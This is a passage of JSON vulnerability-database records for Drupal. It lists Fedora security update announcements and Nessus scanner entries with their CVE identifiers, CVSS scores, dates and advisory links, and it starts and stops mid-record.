secure. 
", "cvss3": {"exploitabilityScore": 2.3, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 5.4, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 2.7}, "published": "2019-04-02T02:15:03", "type": "fedora", "title": "[SECURITY] Fedora 29 Update: drupal7-7.65-1.fc29", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-2922", "CVE-2019-6341"], "modified": "2019-04-02T02:15:03", "id": "FEDORA:5E1A16076017", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/P4KTET2PTSIS3ZZ4SGBRQEN6CCLV5SYX/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-11-27T10:47:49", "description": "Equipped with a powerful blend of features, Drupal is a Content Management System written in PHP that can support a variety of websites ranging from personal weblogs to large community-driven websites. Drupal is highly configurable, skinnable, and secure. 
", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-05-25T03:36:33", "type": "fedora", "title": "[SECURITY] Fedora 29 Update: drupal7-7.67-1.fc29", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-2922", "CVE-2019-11358", "CVE-2019-11831"], "modified": "2019-05-25T03:36:33", "id": "FEDORA:2B920607600F", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/E3NUKPG7V4QEM6QXRMHYR4ABFMW5MM2P/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:51", "description": "Equipped with a powerful blend of features, Drupal is a Content Management System written in PHP that can support a variety of websites ranging from personal weblogs to large community-driven websites. Drupal is highly configurable, skinnable, and secure. 
", "cvss3": {}, "published": "2013-01-05T06:35:46", "type": "fedora", "title": "[SECURITY] Fedora 17 Update: drupal7-7.18-1.fc17", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.0, "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-2922", "CVE-2012-5651", "CVE-2012-5652", "CVE-2012-5653"], "modified": "2013-01-05T06:35:46", "id": "FEDORA:5DED920B93", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/E75FC5W2UXCHOCU27MZQ7573GSM3DXFE/", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:51", "description": "Equipped with a powerful blend of features, Drupal is a Content Management System written in PHP that can support a variety of websites ranging from personal weblogs to large community-driven websites. Drupal is highly configurable, skinnable, and secure. 
", "cvss3": {}, "published": "2013-01-05T06:36:30", "type": "fedora", "title": "[SECURITY] Fedora 16 Update: drupal7-7.18-1.fc16", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.0, "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-2922", "CVE-2012-5651", "CVE-2012-5652", "CVE-2012-5653"], "modified": "2013-01-05T06:36:30", "id": "FEDORA:0C91720BC3", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/D7M25LEJTNJOXJGIF6XTPJ7MN4IYMX2G/", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:54", "description": "Equipped with a powerful blend of features, Drupal is a Content Management System written in PHP that can support a variety of websites ranging from personal weblogs to large community-driven websites. Drupal is highly configurable, skinnable, and secure. 
", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-05-10T19:16:35", "type": "fedora", "title": "[SECURITY] Fedora 27 Update: drupal7-7.59-1.fc27", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-6927", "CVE-2017-6928", "CVE-2017-6929", "CVE-2017-6932", "CVE-2018-7600", "CVE-2018-7602"], "modified": "2018-05-10T19:16:35", "id": "FEDORA:9FC6E6070D50", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/GYT7R43FLLEEG4N2QS3FDGZ3NNHOL3HL/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:54", "description": "Drupal is an open source content management platform powering millions of websites and applications. It's built, used, and supported by an active and diverse community of people around the world. 
", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-05-09T21:27:49", "type": "fedora", "title": "[SECURITY] Fedora 28 Update: drupal8-8.4.8-1.fc28", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-6926", "CVE-2017-6927", "CVE-2017-6930", "CVE-2017-6931", "CVE-2018-7600", "CVE-2018-7602", "CVE-2018-9861"], "modified": "2018-05-09T21:27:49", "id": "FEDORA:5C39A60311F1", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/OKWJWSEKSJJSQ7G5K3DVNXGLB44LQX64/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:54", "description": "Drupal is an open source content management platform powering millions of websites and applications. It's built, used, and supported by an active and diverse community of people around the world. 
", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-05-10T19:13:53", "type": "fedora", "title": "[SECURITY] Fedora 27 Update: drupal8-8.4.8-1.fc27", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-6926", "CVE-2017-6927", "CVE-2017-6930", "CVE-2017-6931", "CVE-2018-7600", "CVE-2018-7602", "CVE-2018-9861"], "modified": "2018-05-10T19:13:53", "id": "FEDORA:17401605E206", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/L2NHXS355OJ7C7ZEAGKMOPFWU6SUYYUV/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-28T14:46:50", "description": "Drupal is an open source content management platform powering millions of websites and applications. It's built, used, and supported by an active and diverse community of people around the world. 
", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-12-03T01:39:06", "type": "fedora", "title": "[SECURITY] Fedora 28 Update: drupal8-8.6.2-1.fc28", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-6926", "CVE-2017-6927", "CVE-2017-6930", "CVE-2017-6931", "CVE-2018-7600", "CVE-2018-7602", "CVE-2018-9861"], "modified": "2018-12-03T01:39:06", "id": "FEDORA:4B26D6048172", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/ZGZBSHQC6C3WLIATUZXNKC3DB73ADIXZ/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-28T14:46:50", "description": "Drupal is an open source content management platform powering millions of websites and applications. It's built, used, and supported by an active and diverse community of people around the world. 
", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-03-07T20:06:44", "type": "fedora", "title": "[SECURITY] Fedora 28 Update: drupal8-8.6.10-1.fc28", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-6926", "CVE-2017-6927", "CVE-2017-6930", "CVE-2017-6931", "CVE-2018-7600", "CVE-2018-7602", "CVE-2018-9861"], "modified": "2019-03-07T20:06:44", "id": "FEDORA:7595560DCBCA", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/GLVLVCDPE4WHN5IUYGRFCMSNPXSJ56PU/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:54", "description": "Equipped with a powerful blend of features, Drupal is a Content Management System written in PHP that can support a variety of websites ranging from personal weblogs to large community-driven websites. Drupal is highly configurable, skinnable, and secure. 
", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-05-10T19:11:07", "type": "fedora", "title": "[SECURITY] Fedora 26 Update: drupal7-7.59-1.fc26", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-6922", "CVE-2017-6927", "CVE-2017-6928", "CVE-2017-6929", "CVE-2017-6932", "CVE-2018-7600", "CVE-2018-7602"], "modified": "2018-05-10T19:11:07", "id": "FEDORA:45D79604B015", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/6MFVJWW3I4N6VEV7R3N23SPQMTUAXVS5/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-28T14:46:50", "description": "Drupal is an open source content management platform powering millions of websites and applications. It's built, used, and supported by an active and diverse community of people around the world. 
", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-04-02T01:37:00", "type": "fedora", "title": "[SECURITY] Fedora 28 Update: drupal8-8.6.13-1.fc28", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-6926", "CVE-2017-6927", "CVE-2017-6930", "CVE-2017-6931", "CVE-2018-7600", "CVE-2018-7602", "CVE-2018-9861", "CVE-2019-6341"], "modified": "2019-04-02T01:37:00", "id": "FEDORA:2C56E6076005", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/QNTLCBAN6T7WYR5C4TNEYQD65IIR3V4P/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-28T14:46:50", "description": "Drupal is an open source content management platform powering millions of websites and applications. It's built, used, and supported by an active and diverse community of people around the world. 
", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-05-08T01:19:07", "type": "fedora", "title": "[SECURITY] Fedora 28 Update: drupal8-8.6.15-1.fc28", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-6926", "CVE-2017-6927", "CVE-2017-6930", "CVE-2017-6931", "CVE-2018-7600", "CVE-2018-7602", "CVE-2018-9861", "CVE-2019-10909", "CVE-2019-10910", "CVE-2019-10911", "CVE-2019-11358"], "modified": "2019-05-08T01:19:07", "id": "FEDORA:3F234602D69C", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/4UOAZIFCSZ3ENEFOR5IXX6NFAD3HV7FA/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2023-01-11T14:51:30", "description": "According to its self-reported version number, the detected Drupal application is affected by a remote code execution vulnerability.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", 
"attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-11-05T00:00:00", "type": "nessus", "title": "Drupal 8.5.x < 8.5.3 Remote Code Execution Vulnerability", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7602"], "modified": "2022-10-26T00:00:00", "cpe": ["cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_98573", "href": "https://www.tenable.com/plugins/was/98573", "sourceData": "No source data", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:51:41", "description": "According to its self-reported version number, the detected Drupal application is affected by a remote code execution vulnerability.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, 
"impactScore": 5.9}, "published": "2018-11-05T00:00:00", "type": "nessus", "title": "Drupal 8.3.x < 8.5.3 Remote Code Execution Vulnerability", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7602"], "modified": "2022-10-26T00:00:00", "cpe": ["cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_98575", "href": "https://www.tenable.com/plugins/was/98575", "sourceData": "No source data", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:51:53", "description": "According to its self-reported version number, the detected Drupal application is affected by a remote code execution vulnerability.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-11-05T00:00:00", "type": "nessus", "title": "Drupal 8.2.x < 8.5.3 Remote Code Execution Vulnerability", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, 
"obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7602"], "modified": "2022-10-26T00:00:00", "cpe": ["cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_98576", "href": "https://www.tenable.com/plugins/was/98576", "sourceData": "No source data", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:51:34", "description": "According to its self-reported version number, the detected Drupal application is affected by a remote code execution vulnerability.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-11-05T00:00:00", "type": "nessus", "title": "Drupal 8.0.x < 8.5.3 Remote Code Execution Vulnerability", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": 
"NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7602"], "modified": "2022-10-26T00:00:00", "cpe": ["cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_98578", "href": "https://www.tenable.com/plugins/was/98578", "sourceData": "No source data", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:51:40", "description": "According to its self-reported version number, the detected Drupal application is affected by a remote code execution vulnerability.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-11-05T00:00:00", "type": "nessus", "title": "Drupal 8.4.x < 8.4.8 Remote Code Execution Vulnerability", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7602"], "modified": "2022-10-26T00:00:00", "cpe": ["cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_98574", "href": "https://www.tenable.com/plugins/was/98574", 
"sourceData": "No source data", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:47:23", "description": "- https://www.drupal.org/project/drupal/releases/7.59\n\n - https://www.drupal.org/SA-CORE-2018-004\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-01-03T00:00:00", "type": "nessus", "title": "Fedora 28 : drupal7 (2018-43c64deada) 